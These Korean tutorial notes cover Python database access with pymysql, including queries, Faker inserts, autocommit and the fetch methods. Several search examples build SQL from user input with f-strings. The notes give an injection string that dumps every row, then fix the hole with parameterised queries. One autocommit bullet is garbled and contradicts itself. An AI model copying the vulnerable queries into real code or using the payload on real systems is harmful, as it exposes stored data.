• DDL은 데이터가 저장되는 공간을 조작
• DCL은 데이터베이스 자체를 제어 
• TCL은 하나의 단위 업무로서 처리해야 하는 것

3. 데이터 조회

import pymysql

# 데이터베이스에 연결을 생성
try:
    with pymysql.connect(host="localhost", port=3306, user="springboot",
                         passwd="qwert12345", db="sampledb") as conn:
        # 조회 쿼리를 작성
        query = "select member_id, member_name, member_age, member_email from members"

        # 커서를 생성해서 조회 쿼리를 실행
        curr = conn.cursor()
        curr.execute(query)

        # 조회 결과를 출력
        for c in curr:
            print(c)

except pymysql.MySQLError as e:
    print(e)

• 출력 : (1, '홍길동', 23, 'hong@test.com')
• SQL 실습 환경 구성에서 넣었던 테스트 데이터가 출력
• cursorclass를 지정하지 않으면 SELECT 결과를 값으로 구성된 튜플 타입으로 리턴

import pymysql

# 데이터베이스에 연결을 생성
try:
    with pymysql.connect(host="localhost", port=3306, user="springboot",
                         passwd="qwert12345", db="sampledb",
                         cursorclass=pymysql.cursors.DictCursor) as conn:
        # 조회 쿼리를 작성
        query = "select member_id, member_name, member_age, member_email from members"

        # 커서를 생성해서 조회 쿼리를 실행
        curr = conn.cursor()
        curr.execute(query)

        # 조회 결과를 출력
        for c in curr:
            print(c)

except pymysql.MySQLError as e:
    print(e)

• 출력 : {'member_id': 1, 'member_name': '홍길동', 'member_age': 23, 'member_email': 'hong@test.com'}
• cursorclass를 pymysql.cursors.DictCursor으로 설정
• cursorclass를 설정하면 SELECT 결과를 컬럼 이름과 값으로 구성된 딕셔너리를 반환

4. 데이터베이스 접속

import pymysql

pymysql.connect(host="localhost",   # 데이터베이스 주소
    port=3306,                      # 데이터베이스 서비스 포트 (MySQL 기본 포트: 3306)
    user="springboot",              # 데이터베이스 접속 계정 
    passwd="qwert12345",            # 데이터베이스 사용자 패스워드
    db="sampledb"                   # 사용할 데이터베이스/스키마
    autocommit=True|False         # INSERT, UPDATE, DELETE 구문 실행 결과를 자동으로 반영할지 여부를 설정
    cursorclass=pymysql.cursors.DictCursor  # SELECT 결과를 컬럼명과 값으로 구성된 dict 타입으로 반환
)

5. 데이터 추가

1) Faker 데이터 추가

import pymysql
from faker import Faker

try:
    with pymysql.connect(host="localhost", port=3306, user="springboot", passwd="qwert12345",
                         db="sampledb", cursorclass=pymysql.cursors.DictCursor) as conn:

        curr = conn.cursor()

        fake = Faker('ko-KR')
        for i in range(10):        # Faker 데이터를 10개 입력 반복문
            query = f"insert into members (member_name, member_age, member_email) values \
            ('{fake.name()}', {fake.pyint(10, 30)}, '{fake.email()}')"
            print(query)
            curr.execute(query)

        conn.commit()            # 10개의 insert 구문의 실행 결과를 DB에 반영

except pymysql.MySQLError as e:
    print(e)

2) autocommit = True

import pymysql
from faker import Faker

# 데이터베이스 연결 시 autocommit을 True로 설정

try:
    with pymysql.connect(host="localhost", port=3306, user="springboot", passwd="qwert12345",
                         db="sampledb", cursorclass=pymysql.cursors.DictCursor,
                         autocommit=True) as conn:

        curr = conn.cursor()

        fake = Faker('ko-KR')
        for i in range(10):
            query = f"insert into members (member_name, member_age, member_email) values \
            ('{fake.name()}', {fake.pyint(10, 30)}, '{fake.email()}')"
            print(query)
            curr.execute(query)

        # conn.commit()

except pymysql.MySQLError as e:
    print(e)

위 코드 connect에서 auto commit = True로 하면 commit() 함수를 호출하지 않아도 변경사항이 DB에 반영되는 것을 확인할 수 있다.

• 트렌젝션 관리가 필요한 경우 connect에 autocommit=False(기본값)으로 설정해 사용하지 않는 것이 좋다 않다.
• 관리가 필요하지 않은 경우에는 connect에 autocommit=True(기본값)으로 설정해 사용해서 자동으로 등록되는 것을 볼 수 있다.

3) 데이터 추가 후 조회

(1) fetchone() 

• 커서로부터 하나의 행(레코드)을 리턴

import pymysql
from faker import Faker

# 데이터 추가 후 조회하도록 수정
# fetchone() - 커서로부터 하나의 행(레코드)을 반환

try:
    with pymysql.connect(host="localhost", port=3306, user="springboot", passwd="qwert12345",
                         db="sampledb", cursorclass=pymysql.cursors.DictCursor) as conn:

        curr = conn.cursor()

        fake = Faker('ko-KR')
        for i in range(10):
            query = f"insert into members (member_name, member_age, member_email) values \
            ('{fake.name()}', {fake.pyint(10, 30)}, '{fake.email()}')"
            print(query)
            curr.execute(query)

        conn.commit()

        query = "select * from members"
        curr.execute(query)

        # 조회 결과를 하나씩 가져오기
        while True :
            result = curr.fetchone()
            if result == None : break
            print(result)

except pymysql.MySQLError as e:
    print(e)

(2) fetchall()

• 커서로부터 모든 행(레코드)을 반환

import pymysql
from faker import Faker

# # 데이터 추가 후 조회하도록 수정
# fetchall() - 커서로부터 모든 행(레코드)을 반환

# 데이터베이스에 연결을 생성
try:
    with pymysql.connect(host="localhost", port=3306, user="springboot", passwd="qwert12345",
                         db="sampledb", cursorclass=pymysql.cursors.DictCursor) as conn:

        curr = conn.cursor()

        fake = Faker('ko-KR')
        for i in range(10):
            query = f"insert into members (member_name, member_age, member_email) values \
            ('{fake.name()}', {fake.pyint(10, 30)}, '{fake.email()}')"
            print(query)
            curr.execute(query)

        conn.commit()

        query = "select * from members"
        curr.execute(query)

        # 커서로부터 모든 행(레코드) 조회 결과를 반환 
        results = curr.fetchall()  
        for result in results:
            print(result)

except pymysql.MySQLError as e:
    print(e)

(3) fetchmany(n)

• 커서로부터 n개의 행(레코드)을 반환

import pymysql
from faker import Faker

# 데이터 추가 후 조회하도록 수정
# fetchmany(n) - 커서로부터 n개의 행(레코드)을 반환

# 데이터베이스에 연결을 생성
try:
    with pymysql.connect(host="localhost", port=3306, user="springboot", passwd="qwert12345",
                         db="sampledb", cursorclass=pymysql.cursors.DictCursor) as conn:

        curr = conn.cursor()

        fake = Faker('ko-KR')
        for i in range(10):
            query = f"insert into members (member_name, member_age, member_email) values \
            ('{fake.name()}', {fake.pyint(10, 30)}, '{fake.email()}')"
            print(query)
            curr.execute(query)

        conn.commit()

        query = "select * from members"
        curr.execute(query)

        # 커서로부터 조회 결과의 일부를 반환
        results = curr.fetchmany(10)        # 조회 결과의 첫 부분 10개를 가져와서 반환
        for result in results:
            print(result)

        print("*" * 10)

        results = curr.fetchmany(10)        # 앞에서 가져온 다음(11번째)부터 데이터를 반환
        for result in results:  
            print(result)

except pymysql.MySQLError as e:
    print(e)

6. 데이터 조회

1) 입력한 내용화 일치하는 데이터 조회

import pymysql

# 입력한 내용과 일치하는 데이터를 조회

try:
    with pymysql.connect(host="localhost", port=3306, user="springboot",
                         passwd="qwert12345", db="sampledb",
                         cursorclass=pymysql.cursors.DictCursor) as conn:

        curr = conn.cursor()

        name = input("검색할 이름을 입력하세요 : ")

        query = f"select * from members where member_name = '{name}'"
        curr.execute(query)

        results = curr.fetchall()
        for result in results:
            print(f"ID : {result['member_id']}")    # 컬럼의 이름으로 값을 추출하는 것이 가능
            print(f"이름 : {result['member_name']}")
            print(f"나이 : {result['member_age']}")
            print(f"이메일 : {result['member_email']}")

except pymysql.MySQLError as e:
    print(e)

2) 입력한 내용을 포함하고 있는 데이터 조회

import pymysql

# 입력한 내용을 포함하고 있는 데이터를 조회

try:
    with pymysql.connect(host="localhost", port=3306, user="springboot",
                         passwd="qwert12345", db="sampledb", 
                         cursorclass=pymysql.cursors.DictCursor) as conn:

        curr = conn.cursor()

        name = input("검색할 이름을 입력하세요 : ")

        query = f"select * from members where member_name like '%{name}%'"
        count = curr.execute(query)            
        print(f"총 {count}건을 조회했습니다.")
        # SELECT 구문인 경우 조회 결과 개수를 반환
        # INSERT, UPDATE, DELETE 구문인 경우 등록, 수정, 삭제된 행의 개수를 반환

        results = curr.fetchall()
        print(f"총 {len(results)}건을 조회했습니다.")
        for result in results:
            print(f"ID : {result['member_id']}")
            print(f"이름 : {result['member_name']}")
            print(f"나이 : {result['member_age']}")
            print(f"이메일 : {result['member_email']}")

except pymysql.MySQLError as e:
    print(e)

• LIKE문은 검색하는 내용이 포함되어 있는 데이터를 검색해 준다.

LIKE 문을 위 코드와 같이 직접적으로 사용하면 보안에 취약해 SQL 인젝션 공격을 할 수 있다.

검색할 이름을 입력할 때 a' or 'a' = 'a' or 'a를 입력하면 SQL 인젝션 공격이 되어서 모든 데이터를 조회할 수 있다.

이 문제를 막기 위해서는 구조화된 쿼리를 실행하는 형태로 변경해야 한다.

(1) 구조화된 쿼리를 실행하는 형태

import pymysql

# 구조화된 쿼리를 실행하는 형태로 변경 SQL injection

# 입력한 내용을 포함하고 있는 데이터를 조회

try:
    with pymysql.connect(host="localhost", port=3306, user="springboot",
                         passwd="qwert12345", db="sampledb",
                         cursorclass=pymysql.cursors.DictCursor) as conn:

        curr = conn.cursor()

        name = input("검색할 이름을 입력하세요 : ")

        query = "select * from members where member_name like %s"   
        count = curr.execute(query, ('%'+name+'%',))               
        print(f"총 {count}건을 조회했습니다.")                     

        results = curr.fetchall()
        print(f"총 {len(results)}건을 조회했습니다.")
        for result in results:
            print(f"ID : {result['member_id']}")
            print(f"이름 : {result['member_name']}")
            print(f"나이 : {result['member_age']}")
            print(f"이메일 : {result['member_email']}")

except pymysql.MySQLError as e:
    print(e)

• %s 문자열 데이터 쿼리문의 구조를 정의
• execute() 함수의 두 번째 인자에 쿼리 실행에 필요한 값을 튜플 또는 딕셔너리를 통해 전달
• execute() 함수가 값을 안전한 형태로 변경해서 쿼리를 생성, 실행

위 코드와 같이 구조화된 코드로 작성하면 a' or 'a' = 'a' or 'a를 입력해도 데이터를 조회할 수 없다.